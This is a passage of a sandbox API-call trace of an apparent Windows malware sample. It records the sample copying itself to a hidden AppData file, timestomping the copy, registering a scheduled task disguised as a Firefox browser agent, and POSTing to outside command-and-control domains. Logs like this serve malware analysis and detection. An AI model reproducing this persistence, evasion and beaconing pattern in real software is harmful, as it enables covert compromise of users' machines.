RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31840) returned 0x16 [0130.991] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31840) returned 1 [0130.991] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x24) returned 0x4a31840 [0130.991] lstrlenA (lpString="http://host-host-file8.com/") returned 27 [0130.991] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x4a31840, Length=0x1b) returned 0x1c0d8e43 [0130.991] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31840) returned 0x24 [0130.992] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31840) returned 1 [0130.992] lstrcmpW (lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 1 [0130.992] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0 [0130.992] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), bFailIfExists=0) returned 1 [0131.669] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\19e29cc8b874c3dd5fa4b724fb6d5d51db0b7c2fd4e954bb7b1dda228b2225fb.exe")) returned 1 [0131.689] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x12) returned 0x4a31840 [0131.689] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x2a) returned 0x4a31860 [0131.689] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x408) returned 0x4a318a0 [0131.689] wsprintfW (in: param_1=0x4a318a0, param_2="%s%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih:Zone.Identifier") returned 61 [0131.689] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih:Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih:zone.identifier")) returned 0 [0131.689] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a318a0) returned 0x408 [0131.690] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a318a0) returned 1 [0131.690] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31840) returned 0x12 [0131.690] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31840) returned 1 [0131.690] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31860) returned 0x2a [0131.690] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31860) returned 1 [0131.690] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x16) returned 0x4a31840 [0131.690] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x210) returned 0x4a31860 [0131.690] GetSystemDirectoryA (in: lpBuffer=0x4a31860, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.690] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0131.690] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2="advapi32.dll" | out: lpString1="C:\\Windows\\system32\\advapi32.dll") returned="C:\\Windows\\system32\\advapi32.dll" [0131.690] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwFileAttributes=0x6) returned 1 [0131.691] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x22c4 [0131.691] GetFileAttributesExA (in: lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), fInfoLevelId=0x0, lpFileInformation=0x101efe30 | out: lpFileInformation=0x101efe30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a16bf4b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a16bf4b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a16bf4b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3ef0)) returned 1 [0131.691] SetFileTime (hFile=0x22c4, lpCreationTime=0x101efe34, lpLastAccessTime=0x101efe3c, lpLastWriteTime=0x101efe44) returned 1 [0131.691] CloseHandle (hObject=0x22c4) returned 1 [0131.691] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31860) returned 0x210 [0131.692] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31860) returned 1 [0131.692] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31840) returned 0x16 [0131.692] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31840) returned 1 [0131.692] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x418) returned 0x4a31840 [0131.692] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" [0131.692] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x212) returned 0x4a31c60 [0131.692] GetUserNameW (in: lpBuffer=0x4a31c60, pcbBuffer=0x101efe70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x101efe70) returned 1 [0131.694] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10d) returned 0x4a31e80 [0131.694] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x4c) returned 0x4a31fa0 [0131.695] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10d) returned 0x4a32000 [0131.695] wsprintfW (in: param_1=0x4a31e80, param_2="Firefox Default Browser Agent %hs" | out: param_1="Firefox Default Browser Agent FE7F15060B875FB9") returned 46 [0131.695] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a32000) returned 0x10d [0131.696] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a32000) returned 1 [0131.696] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31fa0) returned 0x4c [0131.696] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31fa0) returned 1 [0131.696] CoCreateInstance (in: rclsid=0x3d21010*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x3d21000*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x101efd08 | out: ppv=0x101efd08*=0x39c8210) returned 0x0 [0132.022] TaskScheduler:ITaskService:Connect (This=0x39c8210, serverName=0x101efd80*(varType=0x0, wReserved1=0x4a3, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d25257, varVal2=0x5407a6), user=0x101efda0*(varType=0x0, wReserved1=0x4a3, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d25257, varVal2=0x5407a6), domain=0x101efd60*(varType=0x0, wReserved1=0x4a3, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d25257, varVal2=0x5407a6), password=0x101efde0*(varType=0x0, wReserved1=0x4a3, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d25257, varVal2=0x5407a6)) returned 0x0 [0132.076] TaskScheduler:ITaskService:GetFolder (in: This=0x39c8210, Path="", ppFolder=0x101efd28 | out: ppFolder=0x101efd28*=0x39baa80) returned 0x0 [0132.078] ITaskFolder:DeleteTask (This=0x39baa80, Name="Firefox Default Browser Agent FE7F15060B875FB9", flags=0) returned 0x80070002 [0132.079] TaskScheduler:ITaskService:NewTask (in: This=0x39c8210, flags=0x0, ppDefinition=0x101efe40 | out: ppDefinition=0x101efe40*=0x3972640) returned 0x0 [0132.080] ITaskDefinition:get_RegistrationInfo (in: This=0x3972640, ppRegistrationInfo=0x101efd40 | out: ppRegistrationInfo=0x101efd40*=0x39618d0) returned 0x0 [0132.080] IRegistrationInfo:put_Author (This=0x39618d0, Author="RDhJ0CNFevzX") returned 0x0 [0132.080] IUnknown:Release (This=0x39618d0) returned 0x1 [0132.080] ITaskDefinition:get_Settings (in: This=0x3972640, ppSettings=0x101efd18 | out: ppSettings=0x101efd18*=0x3961210) returned 0x0 [0132.080] ITaskSettings:put_StartWhenAvailable (This=0x3961210, StartWhenAvailable=1) returned 0x0 [0132.080] IUnknown:Release (This=0x3961210) returned 0x3 [0132.080] ITaskDefinition:get_Triggers (in: This=0x3972640, ppTriggers=0x101efd20 | out: ppTriggers=0x101efd20*=0x3975d70) returned 0x0 [0132.081] ITriggerCollection:Create (in: This=0x3975d70, Type=1, ppTrigger=0x101efe30 | out: ppTrigger=0x101efe30*=0x3973600) returned 0x0 [0132.081] IUnknown:QueryInterface (in: This=0x3973600, riid=0x3d21030*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x101efd10 | out: ppvObject=0x101efd10*=0x3973600) returned 0x0 [0132.081] ITrigger:get_Repetition (in: This=0x3973600, ppRepeat=0x101efd00 | out: ppRepeat=0x101efd00*=0x39c42a0) returned 0x0 [0132.081] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x14) returned 0x4a31fa0 [0132.081] IRepetitionPattern:put_Interval (This=0x39c42a0, Interval="PT10M") returned 0x0 [0132.081] ITrigger:put_Repetition (This=0x3973600, Repetition=0x39c42a0) returned 0x0 [0132.081] IUnknown:Release (This=0x39c42a0) returned 0x1 [0132.081] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x30) returned 0x4a31fc0 [0132.081] ITrigger:put_StartBoundary (This=0x3973600, StartBoundary="1999-11-30T00:00:00") returned 0x0 [0132.081] IUnknown:Release (This=0x3973600) returned 0x2 [0132.081] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31fc0) returned 0x30 [0132.082] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31fc0) returned 1 [0132.082] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31fa0) returned 0x14 [0132.082] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31fa0) returned 1 [0132.082] IUnknown:Release (This=0x3973600) returned 0x1 [0132.082] ITriggerCollection:Create (in: This=0x3975d70, Type=9, ppTrigger=0x101efe30 | out: ppTrigger=0x101efe30*=0x39416a0) returned 0x0 [0132.082] IUnknown:QueryInterface (in: This=0x39416a0, riid=0x3d21020*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0x101efd00 | out: ppvObject=0x101efd00*=0x39416a0) returned 0x0 [0132.083] ILogonTrigger:put_UserId (This=0x39416a0, UserId="RDhJ0CNFevzX") returned 0x0 [0132.087] IUnknown:Release (This=0x39416a0) returned 0x2 [0132.087] IUnknown:Release (This=0x39416a0) returned 0x1 [0132.087] ITaskDefinition:get_Actions (in: This=0x3972640, ppActions=0x101efd30 | out: ppActions=0x101efd30*=0x39ba480) returned 0x0 [0132.088] IActionCollection:Create (in: This=0x39ba480, Type=0, ppAction=0x101efd48 | out: ppAction=0x101efd48*=0x39760f0) returned 0x0 [0132.088] IUnknown:Release (This=0x39ba480) returned 0x1 [0132.088] IUnknown:QueryInterface (in: This=0x39760f0, riid=0x3d21040*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x101efd38 | out: ppvObject=0x101efd38*=0x39760f0) returned 0x0 [0132.088] IExecAction:put_Path (This=0x39760f0, Path="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 0x0 [0132.088] IUnknown:Release (This=0x39760f0) returned 0x2 [0132.088] ITaskFolder:RegisterTaskDefinition (in: This=0x39baa80, Path="Firefox Default Browser Agent FE7F15060B875FB9", pDefinition=0x3972640, flags=6, UserId=0x101efd60*(varType=0x0, wReserved1=0x4a3, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d25257, varVal2=0x5407a6), password=0x101efda0*(varType=0x0, wReserved1=0x4a3, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d25257, varVal2=0x5407a6), LogonType=3, sddl=0x101efd80*(varType=0x0, wReserved1=0x4a3, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d25257, varVal2=0x5407a6), ppTask=0x101efd00 | out: ppTask=0x101efd00*=0x3961bd0) returned 0x0 [0132.866] IUnknown:Release (This=0x39760f0) returned 0x1 [0132.866] IUnknown:Release (This=0x3975d70) returned 0x1 [0132.866] TaskScheduler:IUnknown:Release (This=0x3972640) returned 0x0 [0132.866] TaskScheduler:IUnknown:Release (This=0x39baa80) returned 0x0 [0132.866] TaskScheduler:IUnknown:Release (This=0x39c8210) returned 0x0 [0132.866] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31e80) returned 0x10d [0132.867] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31e80) returned 1 [0132.867] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31840) returned 0x418 [0132.867] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31840) returned 1 [0132.867] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31c60) returned 0x212 [0132.867] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31c60) returned 1 [0132.867] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x22bc [0132.867] CreateFileMappingA (hFile=0x0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa000, lpName="FE7F15060B875FB9FB2A49F08D5D03120C287F38FF") returned 0x229c [0132.868] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x24) returned 0x4a31840 [0132.868] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc10099e7 [0132.868] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x2f) returned 0x4a31870 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf8d0b5b3 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa18bb8ef [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x95e26a3a [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6e0015d9 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6373e8da [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2ad22c04 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb04b2bc [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5fc5d0e0 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x77125c6 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5b962f2a [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4e81d60a [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6ff52273 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x476cca98 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2a917e35 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2a71fcfb [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xeded9a22 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x236f2b1e [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcf6462f4 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x48ce456e [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x77c57a05 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xca4e954c [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb2784882 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5cbbb513 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1249e371 [0132.868] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcefa8513 [0132.869] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x50386fcd [0132.869] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc7f13e6 [0132.869] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa2ef643a [0132.869] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xaa1e76bb [0132.869] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7d1fc3ac [0132.869] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xeceb339d [0132.869] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x24d13af1 [0132.869] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2a395f87 [0132.869] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5b87c0e9 [0132.869] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x151aa8bd [0132.869] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x47d57ac4 [0132.869] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf00baf8f [0132.869] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf1828aa [0132.869] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x7e) returned 0x4a318b0 [0132.869] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0132.869] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0132.869] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0132.869] lstrcatA (in: lpString1="", lpString2="T$MBC!ca+?Y:e6._9%stgS>,8n=Cvy44>6>AzW" | out: lpString1="T$MBC!ca+?Y:e6._9%stgS>,8n=Cvy44>6>AzW") returned="T$MBC!ca+?Y:e6._9%stgS>,8n=Cvy44>6>AzW" [0132.869] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10c) returned 0x4a31940 [0132.869] lstrlenA (lpString="http://host-file-host6.com/") returned 27 [0132.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4a31840, cbMultiByte=28, lpWideCharStr=0x4a31940, cchWideChar=56 | out: lpWideCharStr="http://host-file-host6.com/") returned 28 [0132.869] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x101efc18 | out: pProxyConfig=0x101efc18) returned 1 [0133.027] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xa1b3f00 [0133.046] WinHttpCrackUrl (in: pwszUrl="http://host-file-host6.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x101efcd0 | out: lpUrlComponents=0x101efcd0) returned 1 [0133.046] WinHttpConnect (hSession=0xa1b3f00, pswzServerName="host-file-host6.com", nServerPort=0x50, dwReserved=0x0) returned 0xa273e30 [0133.047] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x12) returned 0x4a31a60 [0133.047] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x68) returned 0x4a31a80 [0133.047] WinHttpOpenRequest (hConnect=0xa273e30, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0xa106af0 [0133.047] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x4e) returned 0x4a31af0 [0133.047] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10d) returned 0x4a31b50 [0133.047] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x684459b7 [0133.047] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x12) returned 0x4a31c70 [0133.047] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x17) returned 0x4a31c90 [0133.047] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x57ffe68e [0133.047] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf750982d [0133.047] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xae9f6e11 [0133.047] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe236d528 [0133.047] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9e1d20fc [0133.048] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x873b23df [0133.048] wsprintfW (in: param_1=0x4a31b50, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://okdqr.com/") returned 39 [0133.048] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31c90) returned 0x17 [0133.048] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31c90) returned 1 [0133.048] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31c70) returned 0x12 [0133.048] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31c70) returned 1 [0133.048] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31af0) returned 0x4e [0133.048] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31af0) returned 1 [0133.048] WinHttpAddRequestHeaders (hRequest=0xa106af0, pwszHeaders="Accept: */*\r\nReferer: http://okdqr.com/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0133.048] WinHttpSendRequest (hRequest=0xa106af0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x4a318b0*, dwOptionalLength=0x75, dwTotalLength=0x75, dwContext=0x0) returned 1 [0134.283] WinHttpReceiveResponse (hRequest=0xa106af0, lpReserved=0x0) returned 1 [0134.284] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x2800) returned 0x4a31c70 [0134.285] WinHttpReadData (in: hRequest=0xa106af0, lpBuffer=0x4a31c70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x101efd88 | out: lpBuffer=0x4a31c70*, lpdwNumberOfBytesRead=0x101efd88*=0x18) returned 1 [0134.294] RtlReAllocateHeap (Heap=0x4a30000, Flags=0x8, Ptr=0x4a31c70, Size=0x5000) returned 0x4a34480 [0134.295] WinHttpReadData (in: hRequest=0xa106af0, lpBuffer=0x4a34498, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x101efd88 | out: lpBuffer=0x4a34498*, lpdwNumberOfBytesRead=0x101efd88*=0x0) returned 1 [0134.295] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3ed0000 [0134.297] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a34480) returned 1 [0134.297] WinHttpCloseHandle (hInternet=0xa106af0) returned 1 [0134.297] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31b50) returned 0x10d [0134.298] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31b50) returned 1 [0134.298] WinHttpCloseHandle (hInternet=0xa273e30) returned 1 [0134.298] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31a80) returned 0x68 [0134.298] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31a80) returned 1 [0134.298] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31a60) returned 0x12 [0134.298] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31a60) returned 1 [0134.298] WinHttpCloseHandle (hInternet=0xa1b3f00) returned 1 [0134.299] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31940) returned 0x10c [0134.299] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31940) returned 1 [0134.299] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31870) returned 0x2f [0134.299] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31870) returned 1 [0134.299] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a318b0) returned 0x7e [0134.300] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a318b0) returned 1 [0134.300] lstrlenA (lpString="ä\x074|:|plugin_size=0") returned 19 [0134.300] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x15) returned 0x4a31870 [0134.300] lstrlenA (lpString="4|:|plugin_size=0") returned 17 [0134.300] lstrlenA (lpString="plugin_size") returned 11 [0134.300] atoi (_Str="0") returned 0 [0134.301] lstrlenA (lpString="4|:|plugin_size=0") returned 17 [0134.301] lstrlenA (lpString="|:|") returned 3 [0134.301] MapViewOfFile (hFileMappingObject=0x229c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a70000 [0134.322] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0134.322] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x8a70000) returned 0x0 [0134.382] atoi (_Str="4") returned 4 [0134.382] RtlRandom (in: Seed=0x540e9e | 